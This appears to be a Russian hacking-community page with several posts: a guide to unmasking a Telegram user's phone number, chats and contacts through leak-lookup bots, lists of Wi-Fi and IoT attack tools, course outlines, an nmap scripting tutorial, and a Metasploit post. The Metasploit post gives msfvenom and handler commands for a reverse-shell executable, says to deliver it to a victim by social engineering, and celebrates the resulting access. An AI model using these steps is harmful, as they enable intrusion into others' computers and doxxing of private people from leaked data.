Сообщество - Life-Hack [Жизнь-Взлом]/Хакинг
Добавить пост

Life-Hack [Жизнь-Взлом]/Хакинг

251 пост 2 696 подписчиков

Популярные теги в сообществе:

Анализ Telegram аккаунтов

UPD:

Новая ссылка на GTA search, старую снесли.

Анализ Telegram аккаунтов Osint, Telegram, Telegram бот, Информационная безопасность, IT, Длиннопост

Снова приветствую дорогих читателей! Продолжаю цикл статей "ШХ" и сегодня нашим блюдом будет Telegram. В предыдущих статьях мы рассмотрели способы разведки аккаунтов целевого пользователя по его никнейму, после чего проводили разведку его аккаунта в социальной сети Вконтакте. Сейчас я ставлю для себя важным узнать номер телефона пользователя, так как от номера уже можно будет неплохо отталкиваться в разведке и номер телефона может поведать еще больше о своём владельце. В прошлой статье мы пытались выяснить номер при помощи страницы Вконтакте, а в этой как уже догадались по названию, мы будем пытаться выяснить как можно больше информации о Telegram аккаунте.

Дисклеймер: Все данные предоставленные в данной статье, взяты из открытых источников. Не призывают к действию и являются только лишь данными для ознакомления, и изучения механизмов используемых технологий.

1 Этап

Узнаём ID пользователя

Работать в рамках этой статьи как вы догадались мы будем в основном с телеграм-ботами. Большинство ботов просят в качестве входных данных уникальный идентификатор пользователя. Получить его довольно просто, разберём три способа которыми я пользуюсь.

При помощи бота

Как бы банально это не было, но идентификатор можно спокойно получить через того же Глаза Бога, нужно лишь только ввести никнейм и выбрать телеграм.

Анализ Telegram аккаунтов Osint, Telegram, Telegram бот, Информационная безопасность, IT, Длиннопост

Официальный клиент Telegram на ПК

Ещё один простейший способ - это при помощи клиента Telegram на ПК.
Для этого заходим в настройки --> Продвинутые настройки --> Экспериментальные настройки --> Show Peer IDs in Profile.

Анализ Telegram аккаунтов Osint, Telegram, Telegram бот, Информационная безопасность, IT, Длиннопост
Анализ Telegram аккаунтов Osint, Telegram, Telegram бот, Информационная безопасность, IT, Длиннопост
Анализ Telegram аккаунтов Osint, Telegram, Telegram бот, Информационная безопасность, IT, Длиннопост

Теперь у каждого пользователя в профиле мы можем сразу же увидеть его id.

Анализ Telegram аккаунтов Osint, Telegram, Telegram бот, Информационная безопасность, IT, Длиннопост

BGram Android

Модификация клиента Telegram для Android в которой уже встроена эта функция по-умолчанию.

Анализ Telegram аккаунтов Osint, Telegram, Telegram бот, Информационная безопасность, IT, Длиннопост

Этап 2

Узнаём различную информацию о пользователе при помощи ботов

Глаз Бога

При помощи всеми известного бота можно выяснить в цело репутацию аккаунта (была ли какая-либо информация в утечках).

Анализ Telegram аккаунтов Osint, Telegram, Telegram бот, Информационная безопасность, IT, Длиннопост

Как можем наблюдать, аккаунт уже весьма поживший и базах имеется номер телефона, эта информация нам очень пригодится для условно бесплатных ботов.

Insight

На мой скромный взгляд, является одним из лучших условно-бесплатных ботов для разведки телеграм аккаунтов. Определяет хобби владельца, возможное местоположение и много-много чего интересного, один из ярких примеров вы можете наблюдать снизу.

Анализ Telegram аккаунтов Osint, Telegram, Telegram бот, Информационная безопасность, IT, Длиннопост

Для сбора общего портрета о человеке, вполне хороший бот. Валюту для поиска довольно просто получить, бот сам время от времени будет давать тебе понемногу валюты на счёт, опять же всё зависит от того, как часто ты им пользуешься и сколько у тебя аккаунтов.

fun-stat-bot

Ещё один классный бот для сбора общей информации о пользователе, как и предыдущий бот он собирает интересы пользователя исходя из сообществ в которых он состоит. Может выдать прошлые имена аккаунта, ещё что очень интересно, так это сообщения пользователя в публичных чатах даже если они были удалены пользователем ранее.

Анализ Telegram аккаунтов Osint, Telegram, Telegram бот, Информационная безопасность, IT, Длиннопост

Здесь нас приветствует множество пунктов после того как мы ввели id целевого аккаунта, давайте рассмотрим все пункты которые нам доступны. Но вначале радоваться не стоит, так как все пункты открываются за валюту бота "кристаллы знаний". Этой валютой бот делится щедро с вами при первом заходе в бота, и дарит он вам аж целых 20 кристаллов. Валюта может копиться и сама по себе в небольших объёмах.

Первый пункт - это профиль, в нём нам предоставлена информация о том, насколько в целом активен аккаунт, а исходя из этого уже можно сделать вывод о том, основной это аккаунт или нет. Плюс может быть дополнительные имена/теги, а значит и новые никнеймы по которым можно с нуля также начать поиск.

Анализ Telegram аккаунтов Osint, Telegram, Telegram бот, Информационная безопасность, IT, Длиннопост

В пункте "Знакомые" мы можем наблюдать кому пользователь чаще всего отвечает, в публичных чатах разумеется, и логически выяснив с кем пользователь знаком.

Анализ Telegram аккаунтов Osint, Telegram, Telegram бот, Информационная безопасность, IT, Длиннопост
Анализ Telegram аккаунтов Osint, Telegram, Telegram бот, Информационная безопасность, IT, Длиннопост

В пункте "анализ" бот анализирует содержимое сообщений и исходя из этого содержимого делает предположения о симпатиях, возрасте, номере телефона и прочем. Правда где-то местами некорректно выводит, например за "возраст" он посчитал вот это сообщение.

Анализ Telegram аккаунтов Osint, Telegram, Telegram бот, Информационная безопасность, IT, Длиннопост

Пункт "Чаты" мне очень нравится, т.к в нём максимально подробно показано в каких чатах состоит/состоял пользователь.

Анализ Telegram аккаунтов Osint, Telegram, Telegram бот, Информационная безопасность, IT, Длиннопост

Очень подробный пункт "Сообщения", в котором мы будто во вложениях чата Вконтакте можем посмотреть картинки, видео, ссылки и прочие виды сообщений которые присылал пользователь, или же можем просто посмотреть их все.

Анализ Telegram аккаунтов Osint, Telegram, Telegram бот, Информационная безопасность, IT, Длиннопост

Теги, имена пользователя, тоже могут быть крайне полезны.

Анализ Telegram аккаунтов Osint, Telegram, Telegram бот, Информационная безопасность, IT, Длиннопост

Очень любопытной функцией является слежка за пользователем и за его активностью в сети, бывает полезно.

TeleSINT

Ещё один бот, который определит в каких беседах состоит пользователь. Особо добавить мне нечего, т.к его я использую чтобы попробовать извлечь какую-то возможную новую информацию.

Анализ Telegram аккаунтов Osint, Telegram, Telegram бот, Информационная безопасность, IT, Длиннопост

Этап 3

Узнаём номер телефона

Настал важнейший этап - это поиск номера телефона, который станет для нас ключом ко многим другим данным целевого пользователя. В этом пункте будут к сожалению лишь два бота, так как за мою практику это единственные бесплатный и условно-бесплатный боты, при помощи которых мне удавалось эффективно находить номера телефонов аккаунтов.

Telegram Analyst

Полностью бесплатный бот, у которого небольшая база данных телеграм-аккаунтов и весьма редко может выдать что-то толковое, но иногда может повести.

Анализ Telegram аккаунтов Osint, Telegram, Telegram бот, Информационная безопасность, IT, Длиннопост

У этого бота весьма специфичный способ пополнения базы данных, при помощи ботов-ловушек. Актуальный их список к сожалению предоставить не смогу, но найти на нескольких тематических канал думаю не составит труда.

Unamer

Ну и на десерт ещё один замечательный и функциональный бот, который может выдать и историю имени аккаунта и с некоторой вероятностью номер телефона. К сожалению на внутреннюю валюту не такой щедрый как предыдущие боты, но и не тратит валюту в случае если информации не нашёл. Если рассматривать бесплатный вариант пользования, то он одноразовый, или жди несколько веков если тебе капнет что-то бонусом. Если же рассматривать платный вариант, то 11 токенов будут приравнены к 10$, что на момент написания статьи составляет около 930р.

Анализ Telegram аккаунтов Osint, Telegram, Telegram бот, Информационная безопасность, IT, Длиннопост

Заключение

Надеюсь, что боты представленные мной в этой статье помогут в расследованиях и в накоплении опыта энтузиастов. Разумеется почти каждый этот бот условно-бесплатный и куда эффективней было бы использовать платные версии, с чем я охотно соглашусь. Но вы и согласитесь, что для платных версий ботов никаких гайдов и обзоров не нужно тем людям, которые преуспевают в сфере OSINT.

Полезные боты для пробива в телеграме:

Usеrbоx

Глaз Бoга

QuiсkОSINТ

GTА seаrсh

Мы в телеграме, подпишись.

Показать полностью 20

Топ инструментов для аудита беспроводных сетей

•  Reaver – инструмент для атаки на WPS (Wi-Fi Protected Setup), позволяет взломать PIN-код WPS и получить доступ к паролю WPA/WPA2 сети. Содержит многочисленные улучшения и исправления ошибок по сравнению с оригинальной версией.

•  Aircrack-ng – набор инструментов для анализа беспроводных сетей. Включает утилиты для захвата пакетов, анализа трафика, взлома WEP и WPA/WPA2 паролей, а также мониторинга сети. Один из самых популярных инструментов в области аудита беспроводных сетей.

•  Wifite2 – автоматизированный инструмент для аудита беспроводных сетей. Поддерживает множество атак, включая взлом WEP, WPA/WPA2 и другие. Упрощает процесс тестирования безопасности Wi-Fi сетей.

•  Bettercap – мощный инструмент для проведения атак типа MITM, анализа трафика и аудита безопасности сетей. Поддерживает множество протоколов и может использоваться для тестирования как проводных, так и беспроводных сетей.

•  Wifibroot – инструмент для проведения атак на WPA/WPA2 сети с использованием словарных атак. Поддерживает параллельные атаки и может использоваться для быстрого взлома паролей.

•  Kismet – система для пассивного обнаружения беспроводных сетей, захвата пакетов и анализа трафика. Поддерживает множество типов беспроводных сетей, включая Wi-Fi, Bluetooth и другие.

•  Airgeddon – многофункциональный инструмент для аудита беспроводных сетей. Поддерживает различные типы атак, включая взлом WPA/WPA2, создание фальшивых точек доступа и другие.

•  Fluxion – инструмент для проведения атак на WPA/WPA2 сети с использованием методов социальной инженерии. Создает фальшивые точки доступа и перехватывает данные пользователей для взлома паролей.

•  Wifipumpkin3 – инструмент для проведения атак типа MITM на беспроводные сети. Позволяет создавать фальшивые точки доступа, перехватывать и модифицировать трафик.

•  Wifiphisher – Создает фальшивые точки доступа для сбора данных пользователей.

Мы в телеграме, подпишись.

Показать полностью

Топ популярных/полезных постов за прошедшую неделю


1. Предыдущий топ статей
2. macOS Red Teaming
3. Google Dorking
4. Лучшие инструменты для тестирования и поиска уязвимостей API
5. Первая серия материалов - "Введение в OSINT"
6. SQL Injection Cheatsheet
7. Приватный клуб
8. Топ инструментов для аудита беспроводных сетей

Источник

Меряем мир в сосисках!

Пройдя этот тест, вы узнаете, сколько нужно сосисок, чтобы спуститься по ним на дно Марианской впадины. А еще сколько их можно съесть, пока длится самый долгий в мире поцелуй. Не пропустите!

НАЧАТЬ ВИКТОРИНУ

Курс "OSINT для новичков"

На первой неделе курса "OSINT для новичков" мы изучили основы OSINT, типы сбора информации, плюсы и минусы OSINT,  познакомились с правовыми ограничениями, Google Dorks и разобрались, что такое цифровой след.

Если вы что-то пропустили и желаете прочитать, то вот список материалов первой недели:

Первая серия материалов - "Введение в OSINT":

• Введение в OSINT

• Стороны, заинтересованные в OSINT информации

• Типы сбора информации

• Преимущества и проблемы OSINT

• Правовые и этические ограничения

• Цифровой след

• Google Dorking

Не забывайте следить и делиться нашим бесплатным курсом "OSINT для новичков"!

Следующую неделю мы посвятим теме «OSINT инструменты».

Ссылка на источник

Бесплатный теоретический курс "Linux для новичков"

Курс был составлен из различных модулей, предназначенных для ознакомления с основными аспектами работы в операционной системе Linux.

В рамках курса были изучены основы работы с файлами и директориями, управление пользователями и группами, сетевые возможности Linux, мониторинг, журналирование и проверка безопасности. Также были рассмотрены темы работы с данными и дисками в Linux, туннелирование трафика и полезные инструменты для взлома.

Неделя 1: Введение в Linux
• Что такое Linux и почему его выбирают?
• Основные дистрибутивы Linux: Ubuntu, Fedora, CentOS и др.
• Установка Linux: дуализм с Windows, LiveCD и виртуальные машины.
• Основные команды командной строки Linux: cd, ls, mkdir, rm и др.
• Структура файловой системы Linux: /bin, /etc, /home и др.
• Пакетный менеджер APT для установки и обновления программ.
• Основы текстового редактора nano: открытие, редактирование и сохранение файлов.

Неделя 2: Работа с файлами и директориями
• Основные команды для работы с файлами и директориями: cp, mv, rm и др.
• Работа с архивами в Linux: создание, разархивирование, просмотр.
• Поиск файлов и содержимого в Linux: команды find и grep.
• Управление правами доступа к файлам и директориям в Linux: chmod и chown.
• Символьные и жесткие ссылки: создание и использование.
• Управление процессами и задачами в Linux: команды ps, top, kill и др.
• Автоматическое выполнение задач с помощью cron.

Неделя 3: Управление пользователями и группами
• Создание и удаление пользователей в Linux: команды useradd и userdel.
• Управление паролями пользователей: команда passwd.
• Назначение пользователей в группы: команда usermod.
• Создание и удаление групп в Linux: команды groupadd и groupdel.
• Управление правами доступа к файлам и директориям для пользователей и групп.
• Просмотр информации о пользователях и группах: команды id, whoami и др.
• Ограничение доступа пользователей к определенным ресурсам: команды chroot и sudo.

Неделя 4: Сетевые возможности Linux
• Конфигурация сети в Linux: настройка IP-адреса, маски подсети, шлюза.
• Проверка сетевого подключения: команда ping.
• Конфигурация сетевых интерфейсов: команды ifconfig и ip.
• Работа с удаленными хостами через SSH: подключение, передача файлов.
• Конфигурация DNS-сервера в Linux: файл /etc/resolv.conf.
• Настройка файрвола в Linux: команда iptables.
• Основы настройки и использования сетевых служб в Linux: FTP, Samba и др.
• Основы настройки и использования сетевых служб в Linux: Apache.

Неделя 5: Мониторинг, журналирование, проверка безопасности.
• Лог файлы системы Linux
• Как настроить центральный сервер ведения логов с помощью Rsyslog в Linux.
• Анализ лог-файлов: команды grep, awk, sed.
• Настройка системы мониторинга и аудита: утилиты auditd, nmon.
• Система мониторинга Zabbix
• Мониторинг сети с помощью tcpdump
• Проверка безопасности системы с помощью LinPEAS

Неделя 6: Работа с данными и дисками в Linux
• Использование утилиты rsync для синхронизации данных.
• Основы языка сценариев Bash: переменные, условия, циклы.
• Создание и выполнение сценариев Bash: утилита bash.
• Работа с образами дисков: команды dd, ddrescue.
• Восстановление данных с помощью LiveCD.
• Создание и настройка RAID-массивов для защиты данных.
• Дефрагментация диска Linux

Неделя7: Туннелирование трафика
• Установка и настройка OpenVPN сервера на Ubuntu
• Простая настройка WireGuard Linux.
• Настройка Shadowsocks.
• Pivoting: Chisel
• SSH туннели
• Проксирование трафика с помощью proxychains
• Pivoting: Lugolo-ng

Неделя 8: Полезные инструменты для взлома
• nmap 1 часть
• nmap 2 часть
• nmap 3 часть
• crackmapexec
• metasploit
• Burp Suite
• sqlmap

Не забывайте сохранить и поделиться нашим бесплатным курсом "Linux для новичков"!

Ссылка на курс

Показать полностью

Топ инструментов для поиска и эксплуатации уязвимостей в IoT:

Топ инструментов для поиска и эксплуатации уязвимостей в IoT: Хакеры, IT, Информационная безопасность, Инструменты, Github, Софт

PRET - Printer Exploitation Toolkit - Инструмент для тестирования безопасности принтеров.

Expliot - Платформа для тестирования безопасности и эксплуатации устройств IoT

HomePwn  - Фреймворк, предоставляющий функции для аудита и пентестинга устройств, которые сотрудники компании могут использовать в своей повседневной работе и в пределах той же сети.

Praeda - Инструмент для автоматизированного сбора данных и извлечения информации из сетевых устройств.

AttifyOS - Интегрированная операционная система для тестирования безопасности устройств Интернета вещей.

RouterSploit - Фреймворк, имитирующий уязвимости маршрутизатора, написанный на Python.

Peniot - Инструмент для пентестинга и аудита устройств Интернета вещей.

ISF (Industrial Security Framework) - Фреймворк для тестирования промышленных систем управления.

IoTSeeker - Инструмент для обнаружения устройств IoT с паролями по умолчанию.

Kamerka - Инструмент для визуализации географического положения камер безопасности, найденных через API Shodan.

Cameradar - Инструмент для тестирования на проникновение в камеры, использующий протокол RTSP.

Поисковые системы:

IVRE: фреймворк, который включает в себя модули для выполнения пассивного и активного сканирования, обработки и представления данных. IVRE основан на открытом программном обеспечении и может использоваться для анализа трафика и выполнения пентестинга.

Wigle: платформа для сбора, визуализации и анализа данных о беспроводных сетях по всему миру. Может быть полезна для идентификации и отслеживания местоположения беспроводных устройств.

Netlas: поисковая система для цифровых активов и их уязвимостей. Сканирует весь интернет и собирает информацию о каждом связанном устройстве, сервере и веб-сайте.

Censys: поисковая система, которая позволяет исследователям безопасности обнаруживать и анализировать все устройства и сети, подключенные к Интернету.

Мы в телеграме, подпишись.

Показать полностью 1

Metasploit

Metasploit Хакеры, Информационная безопасность, Linux, IT, Софт, Взлом, Длиннопост

Metasploit Framework - это мощный инструмент, который может быть использован как злоумышленниками, так и этичными хакерами и специалистами по тестированию на проникновение для исследования уязвимостей в сетях и на серверах.

Проект Metasploit был создан на языке Perl в 2003 году Эйч Ди Муром (H.D. Moore) при содействии основного разработчика Мэтта Миллера для использования в качестве портативного сетевого инструмента. Он был полностью переведен на язык Ruby к 2007 году, а в 2009 году лицензию приобрела Rapid7, и теперь этот инструмент остается частью ассортимента этой компании, специализирующейся на разработке систем обнаружения вторжений и инструментов эксплуатации уязвимостей систем удаленного доступа.

Этот фреймворк стал основным инструментом разработки эксплойтов. До Metasploit пентестерам приходилось выполнять все проверки вручную, используя различные инструменты, которые могли поддерживать или не поддерживать тестируемую платформу, а также вручную писать собственный код для эксплуатации уязвимостей.

Основными компонентами инструмента являются эксплойты и пэйлоады.

Эксплойт - это код, который эксплуатирует ошибку, неверную настройку или системный сбой — любую брешь в защите. Эксплойт помогает найти ее, а потом воспользоваться, чтобы получить контроль над целевой системой. Создавать эксплойты лучше самостоятельно, но с Metasploit это быстрее и проще. Во фреймворке есть образцы готового кода.

Пэйлоады. Когда эксплойт получает доступ к системе, выполняется определенный код. Его называют пэйлоадом, или полезной нагрузкой. Обычно это шелл-код — команды, написанные на языке оболочки операционной системы, то есть для консоли ОС. Пэйлоад нужен, чтобы установить соединение, запустить вредоносный код или выполнить другую операцию.

Дополнительные модули Metasploit позволяют просканировать сеть и проанализировать трафик, который через нее идет. Это необходимо на начальном этапе атаки — так пентестер получает информацию, нужную для проникновения.

В состав фреймворка входят:

  • библиотеки — в первую очередь библиотека Rex для основных операций. На ней базируются другие — MSF Core и MSF Base. Вместе они составляют основное ядро команд Metasploit;

  • модули — эксплойты, пэйлоады и прочие, о которых рассказывали выше;

  • инструменты — дополнительное ПО для работы;

  • вспомогательные плагины;

  • интерфейсы — то, с помощью чего пользователь взаимодействует с Metasploit. По умолчанию это доступ через консоль или CLI — консольное приложение. Можно установить или настроить графический интерфейс.

Metasploit Хакеры, Информационная безопасность, Linux, IT, Софт, Взлом, Длиннопост

MSFVenom — бесплатный инструмент для создания полезной нагрузки (вредоносного файла). Это, так сказать, двоюродный брат Metasploit. С его помощью вы можете создавать различные полезные нагрузки, шелл-код и обратный шелл.

Reverse TCP (обратное подключение, обратный шелл, пэйлоад) — схема взаимодействия с целевым компьютером. Мы создаем вредоносный файл (полезную нагрузку), после запуска которого целевой компьютер будет пытаться подключиться к нашему компьютеру. Это называется «бэкконнект» или обратный шелл.

Чтобы узнать, какие полезные нагрузки доступны введите команду:

msfvenom -l payloads

Следующая команда создаст вредоносный исполняемый файл (обратный шелл), после запуска которого откроется сеанс Meterpreter.

  • LHOST — IP-адрес вашего компьютера (атакующего).

  • LPORT — порт вашего компьютера, который назначен серверу или программе.

  • P — сокращение от «payload», полезная нагрузка для выбранной платформы.

  • F — параметр, который задает тип файла, например, exe для Windows.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.13 LPORT=4444 -f exe -a x64 -o payload.exe

Мы создали пэйлоад, теперь переходим к следующему этапу. Запускаем msfconsole и вводим команды:

msf> use exploit/multi/handler
msf> set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf> set LHOST 192.168.1.13
msf> set LPORT 4444
msf> run

Этой операцией мы позволяем принять подключение от созданного нами ранее обратного шелла, который запустит жертва.

После создания вредоносного файла необходимо отправить его жертве. Вы можете использовать методы социальной инженерии или любой другой способ доставки вредоносного файла.

После запуска созданного файла откроется сессия Meterpreter:

Metasploit Хакеры, Информационная безопасность, Linux, IT, Софт, Взлом, Длиннопост

Поздравляю, вы получили доступ к компьютеру.

Информация предоставлена для информационных целей.

Мы в телеграме

Показать полностью 2

NMAP. 3 часть

NMAP. 3 часть Хакеры, Информационная безопасность, Linux, IT, Софт, Инструменты, Длиннопост

Часть 1 тут

Часть 2 тут

Nmap Scripting Engine (NSE) — еще одна удобная функция Nmap. Она дает нам возможность создавать скрипты на Lua для взаимодействия с определенными сервисами. Всего существует 14 категорий, на которые можно разделить эти скрипты:

auth  Определение учетных данных для аутентификации.

broadcast  Скрипты, которые используются для обнаружения узлов сети с помощью широковещательной рассылки, могут быть автоматически добавлены к остальным сканированиям.

brute  Выполняет сценарии, которые пытаются войти в соответствующую службу путем перебора учетных данных.

default  Сценарии по умолчанию, выполняемые с помощью параметра -sC.

discovery  Оценка доступных услуг.

dos  Эти скрипты используются для проверки сервисов на наличие уязвимостей типа «отказ в обслуживании» и используются реже, так как это наносит вред сервисам.

exploit  Эта категория скриптов пытается эксплуатировать известные уязвимости для сканируемого порта.

external  Скрипты, использующие внешние сервисы для дальнейшей обработки.

fuzzer  Скрипты для выявления уязвимостей и обработки неожиданных пакетов путем отправки различных полей, что может занять много времени.

intrusive  Скрипты, которые могут негативно повлиять на целевую систему.

malware  Проверяет, не заразило ли целевую систему какое-либо вредоносное ПО.

safe  Безопасные сценарии, которые не осуществляют деструктивных действий.

version  Расширение для обнаружения служб.

vuln  Идентификация конкретных уязвимостей.

Сценарии по умолчанию:

$ sudo nmap <target> -sC

Сценарии определенной категории:

$ sudo nmap <target> --script <category>

Определенные скрипты:

$ sudo nmap <target> --script <script-name>,<script-name>,...

Пример:

$ sudo nmap 10.129.2.28 -p 25 --script banner,smtp-commands
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-16 23:21 CEST
Nmap scan report for 10.129.2.28
Host is up (0.050s latency).

PORT STATE SERVICE
25/tcp open smtp
|_banner: 220 inlane ESMTP Postfix (Ubuntu)
|_smtp-commands: inlane, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8,
MAC Address: DE:AD:00:00:BE:EF (Intel Corporate)

Мы видим, что можем распознать дистрибутив Linux Ubuntu с помощью сценария «banner». Скрипт «smtp-commands» показывает нам, какие команды мы можем использовать при взаимодействии с целевым SMTP-сервером. В этом примере такая информация может помочь нам найти существующих пользователей. Nmap также дает нам возможность сканировать нашу цель с помощью агрессивной опции (-A). При этом цель сканируется с использованием нескольких параметров, таких как обнаружение служб (-sV), обнаружение ОС (-O), трассировка (--traceroute) и сценарии NSE по умолчанию (-sC).

$ sudo nmap 10.129.2.28 -p 80 -A
Starting Nmap 7.80 ( https://nmap.org ) at 2024-04-17 01:38 CEST
Nmap scan report for 10.129.2.28
Host is up (0.012s latency).

PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-generator: WordPress 5.3.4
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: blog.inlanefreight.com
MAC Address: DE:AD:00:00:BE:EF (Intel Corporate)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 2.6.32 (96%), Linux 3.2 - 4.9 (96%), Linux 2.6.32 - 3.10 (96%), Linux 3.4 - 3.10 (95%), Linux 3.1 (95%), Linux 3.2 (95%),
AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Synology DiskStation Manager 5.2-5644 (94%), Netgear RAIDiator 4.2.28 (94%), Linux 2.6.32 - 2.6.35 (94%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop

TRACEROUTE
HOP RTT ADDRESS 1 11.91 ms 10.129.2.28

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.36 seconds

С помощью параметра сканирования (-A) мы выяснили, какой веб-сервер (Apache 2.4.29) запущен в системе, какое веб-приложение (WordPress 5.3.4) используется, а также заголовок (blog.inlanefreight.com) веб-страницы. Кроме того, Nmap показывает, что это, скорее всего, операционная система Linux (96%).

Nmap предлагает нам шесть различных шаблонов синхронизации (-T <0-5>). Эти значения (0–5) определяют агрессивность нашего сканирования. Если сканирование слишком агрессивное, то системы безопасности могут заблокировать нас из-за создаваемого сетевого трафика. Шаблон синхронизации по умолчанию -T 3.

  • -T 0 / -T paranoid

  • -T 1 / -T sneaky

  • -T 2 / -T polite

  • -T 3 / -T normal

  • -T 4 / -T aggressive

  • -T 5 / -T insane

Мы в телеграме

Показать полностью
Отличная работа, все прочитано!